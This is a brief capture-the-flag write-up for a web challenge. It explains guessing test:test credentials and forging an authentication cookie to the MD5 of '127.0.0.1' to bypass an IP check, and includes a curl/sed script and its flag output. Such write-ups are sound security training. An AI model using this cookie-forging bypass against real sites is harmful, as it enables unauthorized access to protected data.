A guessing game; typical web challenge.
First, you must guess the username and password of test:test. There may have been another way to get this, but I found it buy digging through the .bash_history file on the explicit challenge server.
The next part was fiddling with a cookie that get set after logging in.
loc cookie is the md5 hash of an ip address that gets used by the
authentication algorithm. By guessing to change the cookie's value to the
md5 hash of '127.0.0.1', you win permission to download flag.txt.
#!/bin/sh curl -k https://ctf.noconname.org/webster/login.php -c cookies.txt --data "username=test&password=test" # md5('127.0.0.1') => f528764d624db129b32c21fbca0cb8d6 sed 's/c869d000ef5c6fdfa128b058d2865512/f528764d624db129b32c21fbca0cb8d6/g' cookies.txt > good_cookies.txt curl -k https://ctf.noconname.org/webster/content.php?op=4 -b good_cookies.txt
$ ./webster.sh NCN_f528764d624db129b32c21fbca0cb8d6 $